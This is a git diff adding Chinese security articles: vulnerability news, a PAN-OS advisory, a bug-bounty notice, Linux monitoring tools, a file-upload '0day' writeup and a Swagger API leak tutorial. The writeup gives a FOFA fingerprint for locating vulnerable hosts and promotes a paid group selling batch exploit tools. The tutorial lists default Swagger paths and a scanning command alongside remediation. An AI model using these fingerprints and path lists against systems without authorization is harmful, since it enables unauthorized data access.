+![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGC3gsJClsh4Fia0icylyBEnBywibdbkrLLzmpibfdnf5wNYzEUq2GpzfedMKUjlLJQ4uwxAFWLzHhPFQ/640?wx_fmt=jpeg "") + +扫码关注 + +军哥网络安全读报 + +**讲述普通人能听懂的安全故事** + diff --git a/doc/CNVD漏洞周报2024年第46期.md b/doc/CNVD漏洞周报2024年第46期.md index eacc4f35..12be5e7e 100644 --- a/doc/CNVD漏洞周报2024年第46期.md +++ b/doc/CNVD漏洞周报2024年第46期.md @@ -1,5 +1,5 @@ # CNVD漏洞周报2024年第46期 -原创 CNVD CNVD漏洞平台 2024-11-18 08:06 + 国家互联网应急中心CNCERT 2024-11-19 06:49 2 0 diff --git a/doc/Linux网络流量监控工具.md b/doc/Linux网络流量监控工具.md new file mode 100644 index 00000000..0c2eae5b --- /dev/null +++ b/doc/Linux网络流量监控工具.md @@ -0,0 +1,46 @@ +# Linux网络流量监控工具 +原创 大表哥吆 kali笔记 2024-11-20 01:02 + +> 在Linux中,想要查看当前网络情况。常用地命令无非是iftop net­watch cacti等工具。但是这些工具一般都是命令行展示,看不到实际地流量波动效果。 + + +![](https://mmbiz.qpic.cn/mmbiz_png/Xb3L3wnAiatiaA8q3ZHY6AL7sB9YVZK9JXTx7f1KltuibFfP1icWtayzRXmJgVficibNbpEosdn4OhgHZZicLaFaiaoyibA/640?wx_fmt=png&from=appmsg "") + +iftop命令效果 + +想要图形化展示实时流量效果,怎么办呢?故而,本位为大家介绍两款工具Speedometer和Bmon + +Speedome­ter是一款终端下的图形化显示网络速度的工具。分别执行下面命令即可安装。(本文以Kali为例) +``` +apt-get install speedometer -y +# 使用方法 (其中 eth0 是你要监听的网卡名称) +speedometer -rx eth0 -tx eth0 + +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/Xb3L3wnAiatiaA8q3ZHY6AL7sB9YVZK9JXLAbEwXYsO1VNUeiaTSVMYmAb4nhGqCnyarpDibS5CVSiaReiancnku2qLA/640?wx_fmt=png&from=appmsg "") + +效果 + +Speedomete的使用方法很简单,常用的参数有两个 -rx  和 -tx,-rx 代表显示下载速率,-tx 代表显示上传速率,后面接网络接口的名称即可。 + +如果说上面的那款工具过于花哨,可以试试看这款 Bmon,感觉就是增强版的 iftop。它能抓取网络相关统计信息并把它们以用户友好的格式展现出来。 + +**安装** +``` +apt-get install bmon -y +#使用 +bmon + +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/Xb3L3wnAiatiaA8q3ZHY6AL7sB9YVZK9JXb12oTGa6Zt261UOnX3joN3fyAGafR2t1X8hgur2Eyx1ATIcG5zzpUw/640?wx_fmt=png&from=appmsg "") + +简洁更实用 + +当然,如果你有更好地工具分享,欢迎下方留言哦! + +**更多精彩文章 欢迎关注我们** + + + diff --git a/doc/VMware vCenter 和 Kemp LoadMaster 漏洞正受到积极利用.md b/doc/VMware vCenter 和 Kemp LoadMaster 漏洞正受到积极利用.md new file mode 100644 index 00000000..8d754b6d --- /dev/null +++ b/doc/VMware vCenter 和 Kemp LoadMaster 漏洞正受到积极利用.md @@ -0,0 +1,62 @@ +# VMware vCenter 和 Kemp LoadMaster 漏洞正受到积极利用 +会杀毒的单反狗 军哥网络安全读报 2024-11-20 01:00 + +**导****读** + + + +据了解,影响 +Progress Kemp LoadMaster 和 VMware vCenter Server 的安全漏洞现已得到修补,并正在遭到广泛利用。 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGSicEKW0wkjBiadwDknWozm7X7eMEf3e2Ocy4xGdcA18DwG6zcaKtIib5iaDIkgViceW7okXf7icwbxdbA/640?wx_fmt=jpeg&from=appmsg "") + +美国网络安全和基础设施安全局 (CISA) 周一将Progress Kemp LoadMaster +中最高严重性安全漏洞(CVE-2024-1212 +, +CVSS +评分:10.0)添加到其已知被利用漏洞 ( KEV ) 目录中。Progress Software 早在2024 年 2 月就解决了这个问题。 + + +该机构表示:“Progress +Kemp LoadMaster 包含一个操作系统命令注入漏洞,允许未经身份验证的远程攻击者通过 LoadMaster +管理界面访问系统,从而执行任意系统命令。” + + +发现并报告该漏洞的Rhino +安全实验室表示,如果攻击者可以访问管理员 Web 用户界面,则成功利用该漏洞可以在 LoadMaster 上执行命令,从而授予他们对负载均衡器的完全访问权限。 + + +CISA 添加 +CVE-2024-1212 之际,博通也发出警告称,攻击者目前正在利用 VMware vCenter Server +中的两个安全漏洞,这两个漏洞在今年早些时候在中国举行的 Matrix Cup 网络安全竞赛中得到了展示。 + + +这两个漏洞分别为 +CVE-2024-38812(CVSS 评分:9.8)和 CVE-2024-38813(CVSS 评分:7.5),最初于 2024 年 9 +月得到解决,但该公司上个月第二次对前者进行了修复,并表示之前的补丁“并未完全解决”问题。 + +- CVE-2024-38812DCERPC 协议实现中存在堆溢出漏洞,可能允许具有网络访问权限的恶意行为者获取远程代码执行权限 + +- CVE-2024-38813一个权限提升漏洞,可能允许具有网络访问权限的恶意行为者将权限提升至 root + +虽然目前还没有关于在现实世界的攻击中观察到的利用这些漏洞的详细信息,但 +CISA 建议联邦民事行政部门 (FCEB) 机构在 2024 年 12 月 9 日之前修复 CVE-2024-1212,以确保其网络的安全。 + + +几天前,Sophos披露,网络犯罪分子正在积极利用 +Veeam Backup & Replication 中的一个严重漏洞(CVE-2024-40711,CVSS +评分:9.8)来部署一种之前未记录的勒索软件 Frag。 + + +**新闻链接:** + +https://thehackernews.com/2024/11/cisa-alert-active-exploitation-of.html + +![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGC3gsJClsh4Fia0icylyBEnBywibdbkrLLzmpibfdnf5wNYzEUq2GpzfedMKUjlLJQ4uwxAFWLzHhPFQ/640?wx_fmt=jpeg "") + +扫码关注 + +军哥网络安全读报 + +**讲述普通人能听懂的安全故事** + diff --git a/doc/X漏洞奖励计划收录扩大!提供本地环境再享额外20%奖金加成!.md b/doc/X漏洞奖励计划收录扩大!提供本地环境再享额外20%奖金加成!.md new file mode 100644 index 00000000..2b38ad75 --- /dev/null +++ b/doc/X漏洞奖励计划收录扩大!提供本地环境再享额外20%奖金加成!.md @@ -0,0 +1,105 @@ +# X漏洞奖励计划收录扩大!提供本地环境再享额外20%奖金加成! +X 微步在线研究响应中心 2024-11-20 02:01 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/fFyp1gWjicMLyJVFSfPQIECsfSA0Fab9mSK34OBGm3UaKlEwYTFc9ByE7J5ibj49TjRxSfEcibSkCGndUw9LybibZA/640?wx_fmt=jpeg&from=appmsg "") + + +**奖励计划** + +**活动时间** + +2024/11/20-2024/12/31 + + +**奖励计划** + +**活动亮点** + +1. 0day收录范围扩大,不再受限于往期活动范围。 + +2. 非0day开放收录,且新增以下两类收录: +- 新增收录二进制非0day收录:收录范围包括Windows、Linux、Chrome; + +- 新增收录公开时间在一年内(以微步漏洞主页显示时间为准)、且互联网上没有公开详情的CVE / CNVD / CNNVD 漏洞。 + +3.  提供本地漏洞环境(包括但不限于安装包、源码、虚拟机等),可获得额外20%奖金系数加成。 + + +**奖励计划** + +**收录范围** + +**漏洞类型:** +- 能够实现RCE效果的漏洞或组合漏洞(例如:远程代码执行、远程命令执行、文件上传GetShell) + +- 认证绕过(不包括弱口令) + +- 文件读取漏洞(能够获取系统任意文件,至少能够读取应用的配置文件) + +**系统范围:** +主要接收Web漏洞 +- WEB容器、组件、框架以及中间件 + +- 常见Web应用 + +- 集控系统(WEB) + +- 网络设备(WEB) + +更多完整收录要求请查看: + + +https://x.threatbook.com/v5/vulReward#reward-4 + + +**奖励计划** + +**活动奖励** + +**【奖励一】给力基础定价** + +一洞一议,不搞批发。只要漏洞好,价格一定高。 + +**【奖励二】环境奖金加成** + +提供本地漏洞环境(包括但不限于安装包、源码、虚拟机等),可额外获得20%奖金系数加成。 + +例:某系统漏洞价值10000元,提供了本地漏洞环境则可获得10000*(1+20%)=12000 元奖金。 + +**【奖励三】漏洞排行奖励** + +漏洞总价值最高的 Top5 位用户可获得 “X情报社区精美周边礼包”1份。 + + +**奖励计划** + +**参与方式** + +漏洞提交: + +https://x.threatbook.com/v5/vulSubmit +### + +**奖励计划** + +**补充说明** + +- 以上奖励口径取漏洞首次提交时间计算,活动时间外提交的漏洞不在奖励范围内。 + +- 根据漏洞奖励计划规则,0day漏洞在审核通过满90天后报送厂商与监管,厂商确认为未知漏洞,则下发剩余奖励。非0day漏洞在审核通过后7天内互联网未公开该漏洞详情,则下发剩余奖励。 + +- 实物奖励将由X社区工作人员在活动结束后20日内,通过社区站内信、账号绑定邮箱(如有)等方式与你联络收集收货信息,并安排寄送,如遇不可抗力原因将延迟寄送。 + +- 严禁任何形式的作弊,一经发现将作出包括但不限于撤销活动奖励、取消"X漏洞奖励计划"参与资格、永久封号等处理。 + +- 对活动有任何问题,可通过邮件loudong@threatbook.cn,进行反馈与联络。 + + + + +· END · + + + + + diff --git a/doc/【0day】资产管理运营系统(资管云)存在前台文件上传漏洞.md b/doc/【0day】资产管理运营系统(资管云)存在前台文件上传漏洞.md new file mode 100644 index 00000000..7c26be05 --- /dev/null +++ b/doc/【0day】资产管理运营系统(资管云)存在前台文件上传漏洞.md @@ -0,0 +1,134 @@ +# 【0day】资产管理运营系统(资管云)存在前台文件上传漏洞 +原创 xiachuchunmo 银遁安全团队 2024-11-19 23:04 + +**** +**需要EDU SRC邀请码的师傅可以私聊后台,免费赠送EDU SRC邀请码(邀请码管够)** + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**漏洞简介** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +******某公司成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业,公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业园区、公建、后勤等多种业态、通过数字化帮助企业实现数字化转型,有效提高公司管理水平及业务办理效率、降低运营成本,公司自成立以来,已帮助众多企业实现数字化转型。资产管理运营系统存在前台文件上传漏洞。** +**** +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**资产详情** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + +``` +body="media/css/uniform.default.css" && body="资管云" +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibEjpcxD5icTFbbTTsKVH47ZUloQ6cD4AtnBa9FJCo0AdJkTrAEKETbuFKgTiaOibNibm7LajQIyODBXw/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**漏洞复现** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**上传文件测试** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibEjpcxD5icTFbbTTsKVH47Zgiaswb3P1FTPuuEqXNia30CX4eqUXwdI85E6UnSe3uwDPtsf9OSyAZKA/640?wx_fmt=png&from=appmsg "") + +**访问上传文件测试** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibEjpcxD5icTFbbTTsKVH47ZXSkc9a0At1cj8U83c2ESSwykPsTPkegIIrWqKkWP9Y0KkMEEd6WRrw/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**Nuclei测试** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx59l5tmRaic1icJ8rTpS7iaibXsem4QVIKr4FH0dFjvBeEXhR7zjofDsBvvxKeBqRia2Pc85ytIibjNBiax4g/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**圈子介绍** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +高 +质量漏洞利用工具分享社区,每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具,团队内部POC分享,星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。 +如果师傅还是新手,内部的交流群有很多行业老师傅可以为你解答学习上的疑惑,内部分享的POC可以助你在Edu和补天等平台获得一定的排名。 +如果师傅已经 +是老手了,有一个高质量的LD库也能为你的工作提高极大的效率,实战或者攻防中有需要的Day我们也可以通过自己的途径帮你去寻找。 + +**【圈子服务】** + +1,一年至少365+漏洞Poc及对应漏洞批量利用工具 + +2,Fofa永久高级会员 + +3,24HVV内推途径 + +4,Cmd5解密,各种漏洞利用工具及后续更新,渗透工具、文档资源分享 + +5,内部漏洞 +库情报分享 +(目前已有2000+ +poc,会定期更新,包括部分未公开0/1day) + +6,加入内部微信群,认识更多的行业朋友(群里有100+C**D通用证书师傅),遇到任何技术问题都可以进行快速提问、讨论交流; + + +圈子目前价格为**129元** +**(交个朋友啦!)** +,现在星球有近900+位师傅相信并选择加入我们,人数满1000 +**涨价至149**,圈子每天都会更新内容。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/yeJvia5dNx5ibmJXuUnaww610JyW2aMD7XyghxoOEL12QTuKPMtygJ7abCibjickyRUpBPDf52hoXPRu3nWEmjzt5A/640?wx_fmt=jpeg&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**圈子近期更新LD库** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ib2O29UeBntrAgS16oXwLZvdELfGVX4sNVxPSiatCrY9NMx1M47giajq1iayjibDHo3axOViaY9L4ovZ5g/640?wx_fmt=png&from=appmsg "") + +**每篇文章均有详细且完整WriteUp** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/yeJvia5dNx5ibK7Dv4GdXpIuKGmLtjmiaeQuz0vbaPubOpv3oWAehI3Pr5flA7KQSUWtKIyycZezdAxmic5rpy2tHw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +**星球提供免费F**a**![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ic3icibHW6nDoAAoX9Spv9mREyEWTD0kRZWwApI2LKZDlqDfFj0Hnbja85ppeKPty1oOKFD80G5iadWQ/640?wx_fmt=png&from=appmsg "") +**C**D通用证书********一起愉快的刷分**![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibz6ibFL4b8QBThc3t0ok0Gb7jsseWcrYsxNbv9qyQ0uhDib7TkUcLIIos2iaYlzL6TcF3ia2Rric1EH1g/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ickvP43lKosLxs8SB5kCSQQEP05NRM08qqN1YIrU1QF8ILRniaF4Vu2jbHhTypliczTnEuK5TXobk9A/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +**免责声明** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + + +![](https://mmbiz.qpic.cn/mmbiz_gif/HVNK6rZ71oofHnCicjcYq2y5pSeBUgibJg8K4djZgn6iaWb6NGmqxIhX2oPlRmGe6Yk0xBODwnibFF8XCjxhEV3K7w/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "") + +文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 + diff --git a/doc/【渗透工具】Swagger API 信息泄露漏洞 工具篇.md b/doc/【渗透工具】Swagger API 信息泄露漏洞 工具篇.md new file mode 100644 index 00000000..b0e76961 --- /dev/null +++ b/doc/【渗透工具】Swagger API 信息泄露漏洞 工具篇.md @@ -0,0 +1,196 @@ +# 【渗透工具】Swagger API 信息泄露漏洞 工具篇 +小C学安全 小C学安全 2024-11-20 03:29 + +### Swagger API 信息泄露漏洞 工具篇 +- 免责申明 + +- 简介 + +- 默认路径 + +- Swagger-hack工具 + +- 整改建议 + +- 下载链接 + +- 关注公众号 + +免责申明 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMMyL9h3OmYBhJeP7DUeeEmoTZYqrHupR0S4gvsGDWuKxlpbuZQOcIkTQ/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMM4QE6MQeXibzDwsouMMmibdwVqiaicAPXQY2WJMnIU99VicedkIH1Vtzc1Sg/640?wx_fmt=png&from=appmsg "") + +本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!! + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMMomVz7gteKGAT6wJv5iaAiada6E0BkPHhnuZqbx528BZ4H7rgqaJWAFng/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMMG6O2wcpAcicUIXjSHCfD1oTfOygb5P2haUuPqkRtrKRzErRyFKLSb9w/640?wx_fmt=png&from=appmsg "") + + + +简介 + +Swagger是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。 + +相关的方法,参数和模型紧密集成到服务器端的代码,允许API来始终保持同步。Swagger-UI会根据开发人员在代码中的设置来自动生成API说明文档,若存在相关的配置缺陷,攻击者可以未授权翻查Swagger接口文档,得到系统功能API接口的详细参数,再构造参数发包,通过回显获取系统大量的敏感信息。 + +Swagger未开启页面访问限制,Swagger未开启严格的Authorize认证。‍ + + +默认路径 + +swagger未授权访问地址默认路径 +``` +/api +/api-docs +/api-docs/swagger.json +/api.html +/api/api-docs +/api/apidocs +/api/doc +/api/swagger +/api/swagger-ui +/api/swagger-ui.html +/api/swagger-ui.html/ +/api/swagger-ui.json +/api/swagger.json +/api/swagger/ +/api/swagger/ui +/api/swagger/ui/ +/api/swaggerui +/api/swaggerui/ +/api/v1/ +/api/v1/api-docs +/api/v1/apidocs +/api/v1/swagger +/api/v1/swagger-ui +/api/v1/swagger-ui.html +/api/v1/swagger-ui.json +/api/v1/swagger.json +/api/v1/swagger/ +/api/v2 +/api/v2/api-docs +/api/v2/apidocs +/api/v2/swagger +/api/v2/swagger-ui +/api/v2/swagger-ui.html +/api/v2/swagger-ui.json +/api/v2/swagger.json +/api/v2/swagger/ +/api/v3 +/apidocs +/apidocs/swagger.json +/doc.html +/docs/ +/druid/index.html +/graphql +/libs/swaggerui +/libs/swaggerui/ +/spring-security-oauth-resource/swagger-ui.html +/spring-security-rest/api/swagger-ui.html +/sw/swagger-ui.html +/swagger +/swagger-resources +/swagger-resources/configuration/security +/swagger-resources/configuration/security/ +/swagger-resources/configuration/ui +/swagger-resources/configuration/ui/ +/swagger-ui +/swagger-ui.html +/swagger-ui.html#/api-memory-controller +/swagger-ui.html/ +/swagger-ui.json +/swagger-ui/swagger.json +/swagger.json +/swagger.yml +/swagger/ +/swagger/index.html +/swagger/static/index.html +/swagger/swagger-ui.html +/swagger/ui/ +/Swagger/ui/index +/swagger/ui/index +/swagger/v1/swagger.json +/swagger/v2/swagger.json +/template/swagger-ui.html +/user/swagger-ui.html +/user/swagger-ui.html/ +/v1.x/swagger-ui.html +/v1/api-docs +/v1/swagger.json +/v2/api-docs +/v3/api-docs + +``` + +FOFA: +``` +"swagger/index.html" +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMM5oUia8ZIPBcBMKlEV9vPibkp6mibjqs6jOX4N46cnCCICDN59XZa24Icg/640?wx_fmt=png&from=appmsg "") + +找到一个测试地址 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMMsSf0icsVxx2DwsibpmPyCqpKHInd8JgKliagqeD8H3hXnGhicxlv439euw/640?wx_fmt=png&from=appmsg "") + +可以安装浏览器插件Swagger-UI![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMM03AfUIyNYb0ZMEJbyufd41VUADIeaVXHkic8fjX31xBib7WXbBMrp4gg/640?wx_fmt=png&from=appmsg "") + +安装完成后会在Swagger接口泄露的一个站点上显示Authorize关键字,点击按钮可以输入认证信息。![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMMqdNz4bJrajMva5FGZuZDKhfJLNun44ibCaDHkQhaTw0ureU2Fo7UXfg/640?wx_fmt=png&from=appmsg "") +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMMCyuVlHKHU0ib4tbRF7F8PYoDXxMqAvCYBMrnqtNtVZzwHSKH0rBl11Q/640?wx_fmt=png&from=appmsg "") + +访问swagger/v1/swagger.json文件目录存在很多接口泄露 + +Swagger-hack工具 +# 在测试Swagger API 信息泄露漏洞时,有的泄露接口特别多,每一个都手动去试根本试不过来 找到一个Swagger-hack工具,可以自动化访问所有接口 +``` +python swagger-hack2.0.py -u + "http://X.X.X.X/swagger/v0.0.0.0/swagger.json" +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMMa1k01MB9ANfKX38AIG2rgtsuKhvdvbqa24dPXOXFClwv1WDaAibPfnA/640?wx_fmt=png&from=appmsg "") +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMM02iavpiclnZM2k7d8GKdG1UcxibwOUCctd2L8gAWibaLkTvEd4qz4JicFgA/640?wx_fmt=png&from=appmsg "") +# + + +整改建议 +# 在生产节点禁用Swagger2,在maven中禁用所有关于Swagger包 + +结合SpringSecurity/shiro进行认证授权,将Swagger-UI的URLs加入到各自的认证和授权过滤链中,当用户访问Swagger对应的资源时,只有通过认证授权的用户才能进行访问。 +``` +swagger:  config:    # 开启身份认证功能    login: true    username: admin    password: admin +``` + +结合nginx/Filter对对应的接口端点进行访问控制。enable = false 关闭 +``` +public Docket createRestApi() {        return new Docket(DocumentationType.SWAGGER_2)                .apiInfo(apiInfo()).enable(false)                .select()                //为当前包路径                .apis(RequestHandlerSelectors.any())                .paths(PathSelectors.any())                .build();    }     +``` + +下载链接 +# 关注公众号回复 :“20241120” + + +关注公众号 + +             + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BkyJtnXQDAskLkV8WcVk4zic789oFWIMMnx6IGz12gDUyeYMk0pmS260riapeJKiaD72I2nreQou25iadsvKZNIpWg/640?wx_fmt=png&from=appmsg "") + + +扫码关注 + +**小C学安全** + +获取更多精彩内容 + + +**-END-** + + + diff --git a/doc/【漏洞通告】Palo Alto Networks PAN-OS多个高危漏洞安全风险通告.md b/doc/【漏洞通告】Palo Alto Networks PAN-OS多个高危漏洞安全风险通告.md new file mode 100644 index 00000000..ac244455 --- /dev/null +++ b/doc/【漏洞通告】Palo Alto Networks PAN-OS多个高危漏洞安全风险通告.md @@ -0,0 +1,135 @@ +# 【漏洞通告】Palo Alto Networks PAN-OS多个高危漏洞安全风险通告 + 嘉诚安全 2024-11-20 01:56 + +**漏洞背景** + + + + + + + + +近日,嘉诚安全监测到Palo Alto Networks PAN-OS中存在一个身份验证绕过漏洞和一个权限提升漏洞,漏洞编号分别是: +CVE-2024-0012和CVE-2024-9474。 + + +Palo Alto Networks是全球知名的网络安全厂商,PAN-OS是Palo Alto Networks为其防火墙设备开发的操作系统。 + + +鉴于漏洞危害较大,嘉诚安全提醒相关用户尽快更新至安全版本,避免引发漏洞相关的网络安全事件。 + + +**漏洞详情** + + + + + + + + +**1、CVE-2024-0012** + +Palo Alto Networks PAN-OS身份验证绕过漏洞,经研判,该漏洞为 +**高危**漏洞,已发现被 +**在野利用**。可能导致未经身份验证的攻击者通过网络访问管理Web界面,从而获得PAN-OS管理员权限以执行管理操作、篡改配置或利用其他经过身份验证的特权提升漏洞(如CVE-2024-9474)。 + + +**2、CVE-2024-9474** + +Palo Alto Networks PAN-OS权限提升漏洞,经研判,该漏洞为 +**高危**漏洞,已发现被 +**在野利用** +。可能导致具有管理Web界面访问权限的PAN-OS管理员以root权限对防火墙执行恶意操作。 + + +**危害影响** + + + + + + + + +影响版本: + + +**CVE-2024-0012** + +PAN-OS 11.2 < 11.2.4-h1 + +PAN-OS 11.1 < 11.1.5-h1 + +PAN-OS 11.0 < 11.0.6-h1 + +PAN-OS 10.2 < 10.2.12-h2 + + +**CVE-2024-9474** + +PAN-OS 11.2 < 11.2.4-h1 + +PAN-OS 11.1 < 11.1.5-h1 + +PAN-OS 11.0 < 11.0.6-h1 + +PAN-OS 10.2 < 10.2.12-h2 + +PAN-OS 10.1 < 10.1.14-h6 + + +**修复建议** + + + + + + + + +目前这些漏洞已经修复,受影响用户可升级到以下版本: + + +**CVE-2024-0012** + +PAN-OS 11.2  >= 11.2.4-h1 + +PAN-OS 11.1  >= 11.1.5-h1 + +PAN-OS 11.0  >= 11.0.6-h1 + +PAN-OS 10.2  >= 10.2.12-h2 + + +**CVE-2024-9474** + +PAN-OS 11.2 >= 11.2.4-h1 + +PAN-OS 11.1 >= 11.1.5-h1 + +PAN-OS 11.0 >= 11.0.6-h1 + +PAN-OS 10.2 >= 10.2.12-h2 + +PAN-OS 10.1 >= 10.1.14-h6 + + +下载链接: + +https://www.paloaltonetworks.com/network-security/pan-os + +参考链接: + +https://support.paloaltonetworks.com/support + +https://security.paloaltonetworks.com/CVE-2024-0012 + +https://security.paloaltonetworks.com/CVE-2024-9474 + + +![](https://mmbiz.qpic.cn/mmbiz_png/1t8LLTibEW5NtxqlBL1HLib8jMO0PWtibWTWTFPOa3ND1lyaEQyBgp2fodg9A1XxvPjY7L6ILtK26MBGhofWE0ORw/640?wx_fmt=png&wx_ "") +![](https://mmbiz.qpic.cn/sz_mmbiz_gif/sDiaO8GNKJrJnzIYoQAv2nF3pgKm4SgdFkzuniaicBHQxgSdu0U0xyYbNDOcNkDMWCjwJNwKnic9ASAhhxEpkFL6lg/640?wx_fmt=gif&wx_ "") + + diff --git a/doc/【漏洞预警 】SRM智联云采系统存在多处SQL注入漏洞.md b/doc/【漏洞预警 】SRM智联云采系统存在多处SQL注入漏洞.md new file mode 100644 index 00000000..2eec3004 --- /dev/null +++ b/doc/【漏洞预警 